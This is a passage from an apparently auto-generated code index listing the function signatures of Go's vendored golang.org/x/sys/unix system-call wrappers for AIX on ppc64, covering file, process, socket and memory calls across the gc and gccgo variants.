function Times (line 741) | func Times(tms *Tms) (ticks uintptr, err error) { function Umask (line 752) | func Umask(mask int) (oldmask int) { function Uname (line 760) | func Uname(buf *Utsname) (err error) { function Unlink (line 770) | func Unlink(path string) (err error) { function Unlinkat (line 781) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Ustat (line 792) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function write (line 802) | func write(fd int, p []byte) (n int, err error) { function Dup2 (line 819) | func Dup2(oldfd int, newfd int) (err error) { function Fadvise (line 829) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 839) | func Fchown(fd int, uid int, gid int) (err error) { function fstat (line 849) | func fstat(fd int, stat *Stat_t) (err error) { function fstatat (line 859) | func fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 870) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 880) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 890) | func Getegid() (egid int) { function Geteuid (line 898) | func Geteuid() (euid int) { function Getgid (line 906) | func Getgid() (gid int) { function Getuid (line 914) | func Getuid() (uid int) { function Lchown (line 922) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 933) | func Listen(s int, n int) (err error) { function lstat (line 943) | func lstat(path string, stat *Stat_t) (err error) { function Pause (line 954) | func Pause() (err error) { function pread (line 964) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 981) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Select (line 998) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Pselect (line 1009) | func Pselect(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timespec, s... function Setregid (line 1020) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1030) | func Setreuid(ruid int, euid int) (err error) { function Shutdown (line 1040) | func Shutdown(fd int, how int) (err error) { function Splice (line 1050) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function stat (line 1061) | func stat(path string, statptr *Stat_t) (err error) { function Statfs (line 1072) | func Statfs(path string, buf *Statfs_t) (err error) { function Truncate (line 1083) | func Truncate(path string, length int64) (err error) { function bind (line 1094) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 1104) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 1114) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 1125) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 1135) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 1145) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 1155) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 1166) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 1176) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 1186) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 1196) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 1213) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 1229) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 1240) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function munmap (line 1251) | func munmap(addr uintptr, length uintptr) (err error) { function Madvise (line 1261) | func Madvise(b []byte, advice int) (err error) { function Mprotect (line 1277) | func Mprotect(b []byte, prot int) (err error) { function Mlock (line 1293) | func Mlock(b []byte) (err error) { function Mlockall (line 1309) | func Mlockall(flags int) (err error) { function Msync (line 1319) | func Msync(b []byte, flags int) (err error) { function Munlock (line 1335) | func Munlock(b []byte) (err error) { function Munlockall (line 1351) | func Munlockall() (err error) { function pipe (line 1361) | func pipe(p *[2]_C_int) (err error) { function poll (line 1371) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function gettimeofday (line 1382) | func gettimeofday(tv *Timeval, tzp *Timezone) (err error) { function Time (line 1392) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 1403) | func Utime(path string, buf *Utimbuf) (err error) { function Getsystemcfg (line 1414) | func Getsystemcfg(label int) (n uint64) { function umount (line 1422) | func umount(target string) (err error) { function Getrlimit (line 1433) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Seek (line 1443) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function mmap (line 1454) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... FILE: vendor/golang.org/x/sys/unix/zsyscall_aix_ppc64.go function utimes (line 14) | func utimes(path string, times *[2]Timeval) (err error) { function utimensat (line 29) | func utimensat(dirfd int, path string, times *[2]Timespec, flag int) (er... function getcwd (line 44) | func getcwd(buf []byte) (err error) { function accept (line 58) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function getdirent (line 69) | func getdirent(fd int, buf []byte) (n int, err error) { function wait4 (line 84) | func wait4(pid Pid_t, status *_C_int, options int, rusage *Rusage) (wpid... function ioctl (line 95) | func ioctl(fd int, req int, arg uintptr) (err error) { function ioctlPtr (line 105) | func ioctlPtr(fd int, req int, arg unsafe.Pointer) (err error) { function FcntlInt (line 115) | func FcntlInt(fd uintptr, cmd int, arg int) (r int, err error) { function FcntlFlock (line 126) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) (err error) { function fcntl (line 136) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function fsyncRange (line 147) | func fsyncRange(fd int, how int, start int64, length int64) (err error) { function Acct (line 157) | func Acct(path string) (err error) { function Chdir (line 172) | func Chdir(path string) (err error) { function Chroot (line 187) | func Chroot(path string) (err error) { function Close (line 202) | func Close(fd int) (err error) { function Dup (line 212) | func Dup(oldfd int) (fd int, err error) { function Exit (line 223) | func Exit(code int) { function Faccessat (line 230) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 245) | func Fchdir(fd int) (err error) { function Fchmod (line 255) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 265) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchownat (line 280) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fdatasync (line 295) | func Fdatasync(fd int) (err error) { function Getpgid (line 305) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 316) | func Getpgrp() (pid int) { function Getpid (line 324) | func Getpid() (pid int) { function Getppid (line 332) | func Getppid() (ppid int) { function Getpriority (line 340) | func Getpriority(which int, who int) (prio int, err error) { function Getrusage (line 351) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 361) | func Getsid(pid int) (sid int, err error) { function Kill (line 372) | func Kill(pid int, sig Signal) (err error) { function Klogctl (line 382) | func Klogctl(typ int, buf []byte) (n int, err error) { function Mkdir (line 397) | func Mkdir(dirfd int, path string, mode uint32) (err error) { function Mkdirat (line 412) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 427) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 442) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 457) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 472) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 482) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 498) | func Openat(dirfd int, path string, flags int, mode uint32) (fd int, err... function read (line 514) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 529) | func Readlink(path string, buf []byte) (n int, err error) { function Renameat (line 549) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Setdomainname (line 569) | func Setdomainname(p []byte) (err error) { function Sethostname (line 583) | func Sethostname(p []byte) (err error) { function Setpgid (line 597) | func Setpgid(pid int, pgid int) (err error) { function Setsid (line 607) | func Setsid() (pid int, err error) { function Settimeofday (line 618) | func Settimeofday(tv *Timeval) (err error) { function Setuid (line 628) | func Setuid(uid int) (err error) { function Setgid (line 638) | func Setgid(uid int) (err error) { function Setpriority (line 648) | func Setpriority(which int, who int, prio int) (err error) { function Statx (line 658) | func Statx(dirfd int, path string, flags int, mask int, stat *Statx_t) (... function Sync (line 673) | func Sync() { function Times (line 680) | func Times(tms *Tms) (ticks uintptr, err error) { function Umask (line 691) | func Umask(mask int) (oldmask int) { function Uname (line 699) | func Uname(buf *Utsname) (err error) { function Unlink (line 709) | func Unlink(path string) (err error) { function Unlinkat (line 724) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Ustat (line 739) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function write (line 749) | func write(fd int, p []byte) (n int, err error) { function Dup2 (line 764) | func Dup2(oldfd int, newfd int) (err error) { function Fadvise (line 774) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 784) | func Fchown(fd int, uid int, gid int) (err error) { function fstat (line 794) | func fstat(fd int, stat *Stat_t) (err error) { function fstatat (line 804) | func fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 819) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 829) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 839) | func Getegid() (egid int) { function Geteuid (line 847) | func Geteuid() (euid int) { function Getgid (line 855) | func Getgid() (gid int) { function Getuid (line 863) | func Getuid() (uid int) { function Lchown (line 871) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 886) | func Listen(s int, n int) (err error) { function lstat (line 896) | func lstat(path string, stat *Stat_t) (err error) { function Pause (line 911) | func Pause() (err error) { function pread (line 921) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 936) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Select (line 951) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Pselect (line 962) | func Pselect(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timespec, s... function Setregid (line 973) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 983) | func Setreuid(ruid int, euid int) (err error) { function Shutdown (line 993) | func Shutdown(fd int, how int) (err error) { function Splice (line 1003) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function stat (line 1014) | func stat(path string, statptr *Stat_t) (err error) { function Statfs (line 1029) | func Statfs(path string, buf *Statfs_t) (err error) { function Truncate (line 1044) | func Truncate(path string, length int64) (err error) { function bind (line 1059) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 1069) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 1079) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 1090) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 1100) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 1110) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 1120) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 1131) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 1141) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 1151) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 1161) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 1176) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 1190) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 1201) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function munmap (line 1212) | func munmap(addr uintptr, length uintptr) (err error) { function Madvise (line 1222) | func Madvise(b []byte, advice int) (err error) { function Mprotect (line 1236) | func Mprotect(b []byte, prot int) (err error) { function Mlock (line 1250) | func Mlock(b []byte) (err error) { function Mlockall (line 1264) | func Mlockall(flags int) (err error) { function Msync (line 1274) | func Msync(b []byte, flags int) (err error) { function Munlock (line 1288) | func Munlock(b []byte) (err error) { function Munlockall (line 1302) | func Munlockall() (err error) { function pipe (line 1312) | func pipe(p *[2]_C_int) (err error) { function poll (line 1322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function gettimeofday (line 1333) | func gettimeofday(tv *Timeval, tzp *Timezone) (err error) { function Time (line 1343) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 1354) | func Utime(path string, buf *Utimbuf) (err error) { function Getsystemcfg (line 1369) | func Getsystemcfg(label int) (n uint64) { function umount (line 1377) | func umount(target string) (err error) { function Getrlimit (line 1392) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Seek (line 1402) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function mmap (line 1413) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... FILE: vendor/golang.org/x/sys/unix/zsyscall_aix_ppc64_gc.go type syscallFunc (line 246) | type syscallFunc function rawSyscall6 (line 368) | func rawSyscall6(trap, nargs, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 ui... function syscall6 (line 369) | func syscall6(trap, nargs, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintp... function callutimes (line 373) | func callutimes(_p0 uintptr, times uintptr) (r1 uintptr, e1 Errno) { function callutimensat (line 380) | func callutimensat(dirfd int, _p0 uintptr, times uintptr, flag int) (r1 ... function callgetcwd (line 387) | func callgetcwd(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callaccept (line 394) | func callaccept(s int, rsa uintptr, addrlen uintptr) (r1 uintptr, e1 Err... function callgetdirent (line 401) | func callgetdirent(fd int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errn... function callwait4 (line 408) | func callwait4(pid int, status uintptr, options int, rusage uintptr) (r1... function callioctl (line 415) | func callioctl(fd int, req int, arg uintptr) (r1 uintptr, e1 Errno) { function callioctl_ptr (line 422) | func callioctl_ptr(fd int, req int, arg unsafe.Pointer) (r1 uintptr, e1 ... function callfcntl (line 429) | func callfcntl(fd uintptr, cmd int, arg uintptr) (r1 uintptr, e1 Errno) { function callfsync_range (line 436) | func callfsync_range(fd int, how int, start int64, length int64) (r1 uin... function callacct (line 443) | func callacct(_p0 uintptr) (r1 uintptr, e1 Errno) { function callchdir (line 450) | func callchdir(_p0 uintptr) (r1 uintptr, e1 Errno) { function callchroot (line 457) | func callchroot(_p0 uintptr) (r1 uintptr, e1 Errno) { function callclose (line 464) | func callclose(fd int) (r1 uintptr, e1 Errno) { function calldup (line 471) | func calldup(oldfd int) (r1 uintptr, e1 Errno) { function callexit (line 478) | func callexit(code int) (r1 uintptr, e1 Errno) { function callfaccessat (line 485) | func callfaccessat(dirfd int, _p0 uintptr, mode uint32, flags int) (r1 u... function callfchdir (line 492) | func callfchdir(fd int) (r1 uintptr, e1 Errno) { function callfchmod (line 499) | func callfchmod(fd int, mode uint32) (r1 uintptr, e1 Errno) { function callfchmodat (line 506) | func callfchmodat(dirfd int, _p0 uintptr, mode uint32, flags int) (r1 ui... function callfchownat (line 513) | func callfchownat(dirfd int, _p0 uintptr, uid int, gid int, flags int) (... function callfdatasync (line 520) | func callfdatasync(fd int) (r1 uintptr, e1 Errno) { function callgetpgid (line 527) | func callgetpgid(pid int) (r1 uintptr, e1 Errno) { function callgetpgrp (line 534) | func callgetpgrp() (r1 uintptr, e1 Errno) { function callgetpid (line 541) | func callgetpid() (r1 uintptr, e1 Errno) { function callgetppid (line 548) | func callgetppid() (r1 uintptr, e1 Errno) { function callgetpriority (line 555) | func callgetpriority(which int, who int) (r1 uintptr, e1 Errno) { function callgetrusage (line 562) | func callgetrusage(who int, rusage uintptr) (r1 uintptr, e1 Errno) { function callgetsid (line 569) | func callgetsid(pid int) (r1 uintptr, e1 Errno) { function callkill (line 576) | func callkill(pid int, sig int) (r1 uintptr, e1 Errno) { function callsyslog (line 583) | func callsyslog(typ int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmkdir (line 590) | func callmkdir(dirfd int, _p0 uintptr, mode uint32) (r1 uintptr, e1 Errn... function callmkdirat (line 597) | func callmkdirat(dirfd int, _p0 uintptr, mode uint32) (r1 uintptr, e1 Er... function callmkfifo (line 604) | func callmkfifo(_p0 uintptr, mode uint32) (r1 uintptr, e1 Errno) { function callmknod (line 611) | func callmknod(_p0 uintptr, mode uint32, dev int) (r1 uintptr, e1 Errno) { function callmknodat (line 618) | func callmknodat(dirfd int, _p0 uintptr, mode uint32, dev int) (r1 uintp... function callnanosleep (line 625) | func callnanosleep(time uintptr, leftover uintptr) (r1 uintptr, e1 Errno) { function callopen64 (line 632) | func callopen64(_p0 uintptr, mode int, perm uint32) (r1 uintptr, e1 Errn... function callopenat (line 639) | func callopenat(dirfd int, _p0 uintptr, flags int, mode uint32) (r1 uint... function callread (line 646) | func callread(fd int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callreadlink (line 653) | func callreadlink(_p0 uintptr, _p1 uintptr, _lenp1 int) (r1 uintptr, e1 ... function callrenameat (line 660) | func callrenameat(olddirfd int, _p0 uintptr, newdirfd int, _p1 uintptr) ... function callsetdomainname (line 667) | func callsetdomainname(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callsethostname (line 674) | func callsethostname(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callsetpgid (line 681) | func callsetpgid(pid int, pgid int) (r1 uintptr, e1 Errno) { function callsetsid (line 688) | func callsetsid() (r1 uintptr, e1 Errno) { function callsettimeofday (line 695) | func callsettimeofday(tv uintptr) (r1 uintptr, e1 Errno) { function callsetuid (line 702) | func callsetuid(uid int) (r1 uintptr, e1 Errno) { function callsetgid (line 709) | func callsetgid(uid int) (r1 uintptr, e1 Errno) { function callsetpriority (line 716) | func callsetpriority(which int, who int, prio int) (r1 uintptr, e1 Errno) { function callstatx (line 723) | func callstatx(dirfd int, _p0 uintptr, flags int, mask int, stat uintptr... function callsync (line 730) | func callsync() (r1 uintptr, e1 Errno) { function calltimes (line 737) | func calltimes(tms uintptr) (r1 uintptr, e1 Errno) { function callumask (line 744) | func callumask(mask int) (r1 uintptr, e1 Errno) { function calluname (line 751) | func calluname(buf uintptr) (r1 uintptr, e1 Errno) { function callunlink (line 758) | func callunlink(_p0 uintptr) (r1 uintptr, e1 Errno) { function callunlinkat (line 765) | func callunlinkat(dirfd int, _p0 uintptr, flags int) (r1 uintptr, e1 Err... function callustat (line 772) | func callustat(dev int, ubuf uintptr) (r1 uintptr, e1 Errno) { function callwrite (line 779) | func callwrite(fd int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function calldup2 (line 786) | func calldup2(oldfd int, newfd int) (r1 uintptr, e1 Errno) { function callposix_fadvise64 (line 793) | func callposix_fadvise64(fd int, offset int64, length int64, advice int)... function callfchown (line 800) | func callfchown(fd int, uid int, gid int) (r1 uintptr, e1 Errno) { function callfstat (line 807) | func callfstat(fd int, stat uintptr) (r1 uintptr, e1 Errno) { function callfstatat (line 814) | func callfstatat(dirfd int, _p0 uintptr, stat uintptr, flags int) (r1 ui... function callfstatfs (line 821) | func callfstatfs(fd int, buf uintptr) (r1 uintptr, e1 Errno) { function callftruncate (line 828) | func callftruncate(fd int, length int64) (r1 uintptr, e1 Errno) { function callgetegid (line 835) | func callgetegid() (r1 uintptr, e1 Errno) { function callgeteuid (line 842) | func callgeteuid() (r1 uintptr, e1 Errno) { function callgetgid (line 849) | func callgetgid() (r1 uintptr, e1 Errno) { function callgetuid (line 856) | func callgetuid() (r1 uintptr, e1 Errno) { function calllchown (line 863) | func calllchown(_p0 uintptr, uid int, gid int) (r1 uintptr, e1 Errno) { function calllisten (line 870) | func calllisten(s int, n int) (r1 uintptr, e1 Errno) { function calllstat (line 877) | func calllstat(_p0 uintptr, stat uintptr) (r1 uintptr, e1 Errno) { function callpause (line 884) | func callpause() (r1 uintptr, e1 Errno) { function callpread64 (line 891) | func callpread64(fd int, _p0 uintptr, _lenp0 int, offset int64) (r1 uint... function callpwrite64 (line 898) | func callpwrite64(fd int, _p0 uintptr, _lenp0 int, offset int64) (r1 uin... function callselect (line 905) | func callselect(nfd int, r uintptr, w uintptr, e uintptr, timeout uintpt... function callpselect (line 912) | func callpselect(nfd int, r uintptr, w uintptr, e uintptr, timeout uintp... function callsetregid (line 919) | func callsetregid(rgid int, egid int) (r1 uintptr, e1 Errno) { function callsetreuid (line 926) | func callsetreuid(ruid int, euid int) (r1 uintptr, e1 Errno) { function callshutdown (line 933) | func callshutdown(fd int, how int) (r1 uintptr, e1 Errno) { function callsplice (line 940) | func callsplice(rfd int, roff uintptr, wfd int, woff uintptr, len int, f... function callstat (line 947) | func callstat(_p0 uintptr, statptr uintptr) (r1 uintptr, e1 Errno) { function callstatfs (line 954) | func callstatfs(_p0 uintptr, buf uintptr) (r1 uintptr, e1 Errno) { function calltruncate (line 961) | func calltruncate(_p0 uintptr, length int64) (r1 uintptr, e1 Errno) { function callbind (line 968) | func callbind(s int, addr uintptr, addrlen uintptr) (r1 uintptr, e1 Errn... function callconnect (line 975) | func callconnect(s int, addr uintptr, addrlen uintptr) (r1 uintptr, e1 E... function callgetgroups (line 982) | func callgetgroups(n int, list uintptr) (r1 uintptr, e1 Errno) { function callsetgroups (line 989) | func callsetgroups(n int, list uintptr) (r1 uintptr, e1 Errno) { function callgetsockopt (line 996) | func callgetsockopt(s int, level int, name int, val uintptr, vallen uint... function callsetsockopt (line 1003) | func callsetsockopt(s int, level int, name int, val uintptr, vallen uint... function callsocket (line 1010) | func callsocket(domain int, typ int, proto int) (r1 uintptr, e1 Errno) { function callsocketpair (line 1017) | func callsocketpair(domain int, typ int, proto int, fd uintptr) (r1 uint... function callgetpeername (line 1024) | func callgetpeername(fd int, rsa uintptr, addrlen uintptr) (r1 uintptr, ... function callgetsockname (line 1031) | func callgetsockname(fd int, rsa uintptr, addrlen uintptr) (r1 uintptr, ... function callrecvfrom (line 1038) | func callrecvfrom(fd int, _p0 uintptr, _lenp0 int, flags int, from uintp... function callsendto (line 1045) | func callsendto(s int, _p0 uintptr, _lenp0 int, flags int, to uintptr, a... function callnrecvmsg (line 1052) | func callnrecvmsg(s int, msg uintptr, flags int) (r1 uintptr, e1 Errno) { function callnsendmsg (line 1059) | func callnsendmsg(s int, msg uintptr, flags int) (r1 uintptr, e1 Errno) { function callmunmap (line 1066) | func callmunmap(addr uintptr, length uintptr) (r1 uintptr, e1 Errno) { function callmadvise (line 1073) | func callmadvise(_p0 uintptr, _lenp0 int, advice int) (r1 uintptr, e1 Er... function callmprotect (line 1080) | func callmprotect(_p0 uintptr, _lenp0 int, prot int) (r1 uintptr, e1 Err... function callmlock (line 1087) | func callmlock(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmlockall (line 1094) | func callmlockall(flags int) (r1 uintptr, e1 Errno) { function callmsync (line 1101) | func callmsync(_p0 uintptr, _lenp0 int, flags int) (r1 uintptr, e1 Errno) { function callmunlock (line 1108) | func callmunlock(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmunlockall (line 1115) | func callmunlockall() (r1 uintptr, e1 Errno) { function callpipe (line 1122) | func callpipe(p uintptr) (r1 uintptr, e1 Errno) { function callpoll (line 1129) | func callpoll(fds uintptr, nfds int, timeout int) (r1 uintptr, e1 Errno) { function callgettimeofday (line 1136) | func callgettimeofday(tv uintptr, tzp uintptr) (r1 uintptr, e1 Errno) { function calltime (line 1143) | func calltime(t uintptr) (r1 uintptr, e1 Errno) { function callutime (line 1150) | func callutime(_p0 uintptr, buf uintptr) (r1 uintptr, e1 Errno) { function callgetsystemcfg (line 1157) | func callgetsystemcfg(label int) (r1 uintptr, e1 Errno) { function callumount (line 1164) | func callumount(_p0 uintptr) (r1 uintptr, e1 Errno) { function callgetrlimit (line 1171) | func callgetrlimit(resource int, rlim uintptr) (r1 uintptr, e1 Errno) { function calllseek (line 1178) | func calllseek(fd int, offset int64, whence int) (r1 uintptr, e1 Errno) { function callmmap64 (line 1185) | func callmmap64(addr uintptr, length uintptr, prot int, flags int, fd in... FILE: vendor/golang.org/x/sys/unix/zsyscall_aix_ppc64_gccgo.go function callutimes (line 137) | func callutimes(_p0 uintptr, times uintptr) (r1 uintptr, e1 Errno) { function callutimensat (line 145) | func callutimensat(dirfd int, _p0 uintptr, times uintptr, flag int) (r1 ... function callgetcwd (line 153) | func callgetcwd(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callaccept (line 161) | func callaccept(s int, rsa uintptr, addrlen uintptr) (r1 uintptr, e1 Err... function callgetdirent (line 169) | func callgetdirent(fd int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errn... function callwait4 (line 177) | func callwait4(pid int, status uintptr, options int, rusage uintptr) (r1... function callioctl (line 185) | func callioctl(fd int, req int, arg uintptr) (r1 uintptr, e1 Errno) { function callioctl_ptr (line 193) | func callioctl_ptr(fd int, req int, arg unsafe.Pointer) (r1 uintptr, e1 ... function callfcntl (line 201) | func callfcntl(fd uintptr, cmd int, arg uintptr) (r1 uintptr, e1 Errno) { function callfsync_range (line 209) | func callfsync_range(fd int, how int, start int64, length int64) (r1 uin... function callacct (line 217) | func callacct(_p0 uintptr) (r1 uintptr, e1 Errno) { function callchdir (line 225) | func callchdir(_p0 uintptr) (r1 uintptr, e1 Errno) { function callchroot (line 233) | func callchroot(_p0 uintptr) (r1 uintptr, e1 Errno) { function callclose (line 241) | func callclose(fd int) (r1 uintptr, e1 Errno) { function calldup (line 249) | func calldup(oldfd int) (r1 uintptr, e1 Errno) { function callexit (line 257) | func callexit(code int) (r1 uintptr, e1 Errno) { function callfaccessat (line 265) | func callfaccessat(dirfd int, _p0 uintptr, mode uint32, flags int) (r1 u... function callfchdir (line 273) | func callfchdir(fd int) (r1 uintptr, e1 Errno) { function callfchmod (line 281) | func callfchmod(fd int, mode uint32) (r1 uintptr, e1 Errno) { function callfchmodat (line 289) | func callfchmodat(dirfd int, _p0 uintptr, mode uint32, flags int) (r1 ui... function callfchownat (line 297) | func callfchownat(dirfd int, _p0 uintptr, uid int, gid int, flags int) (... function callfdatasync (line 305) | func callfdatasync(fd int) (r1 uintptr, e1 Errno) { function callgetpgid (line 313) | func callgetpgid(pid int) (r1 uintptr, e1 Errno) { function callgetpgrp (line 321) | func callgetpgrp() (r1 uintptr, e1 Errno) { function callgetpid (line 329) | func callgetpid() (r1 uintptr, e1 Errno) { function callgetppid (line 337) | func callgetppid() (r1 uintptr, e1 Errno) { function callgetpriority (line 345) | func callgetpriority(which int, who int) (r1 uintptr, e1 Errno) { function callgetrusage (line 353) | func callgetrusage(who int, rusage uintptr) (r1 uintptr, e1 Errno) { function callgetsid (line 361) | func callgetsid(pid int) (r1 uintptr, e1 Errno) { function callkill (line 369) | func callkill(pid int, sig int) (r1 uintptr, e1 Errno) { function callsyslog (line 377) | func callsyslog(typ int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmkdir (line 385) | func callmkdir(dirfd int, _p0 uintptr, mode uint32) (r1 uintptr, e1 Errn... function callmkdirat (line 393) | func callmkdirat(dirfd int, _p0 uintptr, mode uint32) (r1 uintptr, e1 Er... function callmkfifo (line 401) | func callmkfifo(_p0 uintptr, mode uint32) (r1 uintptr, e1 Errno) { function callmknod (line 409) | func callmknod(_p0 uintptr, mode uint32, dev int) (r1 uintptr, e1 Errno) { function callmknodat (line 417) | func callmknodat(dirfd int, _p0 uintptr, mode uint32, dev int) (r1 uintp... function callnanosleep (line 425) | func callnanosleep(time uintptr, leftover uintptr) (r1 uintptr, e1 Errno) { function callopen64 (line 433) | func callopen64(_p0 uintptr, mode int, perm uint32) (r1 uintptr, e1 Errn... function callopenat (line 441) | func callopenat(dirfd int, _p0 uintptr, flags int, mode uint32) (r1 uint... function callread (line 449) | func callread(fd int, _p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callreadlink (line 457) | func callreadlink(_p0 uintptr, _p1 uintptr, _lenp1 int) (r1 uintptr, e1 ... function callrenameat (line 465) | func callrenameat(olddirfd int, _p0 uintptr, newdirfd int, _p1 uintptr) ... function callsetdomainname (line 473) | func callsetdomainname(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callsethostname (line 481) | func callsethostname(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callsetpgid (line 489) | func callsetpgid(pid int, pgid int) (r1 uintptr, e1 Errno) { function callsetsid (line 497) | func callsetsid() (r1 uintptr, e1 Errno) { function callsettimeofday (line 505) | func callsettimeofday(tv uintptr) (r1 uintptr, e1 Errno) { function callsetuid (line 513) | func callsetuid(uid int) (r1 uintptr, e1 Errno) { function callsetgid (line 521) | func callsetgid(uid int) (r1 uintptr, e1 Errno) { function callsetpriority (line 529) | func callsetpriority(which int, who int, prio int) (r1 uintptr, e1 Errno) { function callstatx (line 537) | func callstatx(dirfd int, _p0 uintptr, flags int, mask int, stat uintptr... function callsync (line 545) | func callsync() (r1 uintptr, e1 Errno) { function calltimes (line 553) | func calltimes(tms uintptr) (r1 uintptr, e1 Errno) { function callumask (line 561) | func callumask(mask int) (r1 uintptr, e1 Errno) { function calluname (line 569) | func calluname(buf uintptr) (r1 uintptr, e1 Errno) { function callunlink (line 577) | func callunlink(_p0 uintptr) (r1 uintptr, e1 Errno) { function callunlinkat (line 585) | func callunlinkat(dirfd int, _p0 uintptr, flags int) (r1 uintptr, e1 Err... function callustat (line 593) | func callustat(dev int, ubuf uintptr) (r1 uintptr, e1 Errno) { function callwrite (line 601) | func callwrite(fd int, 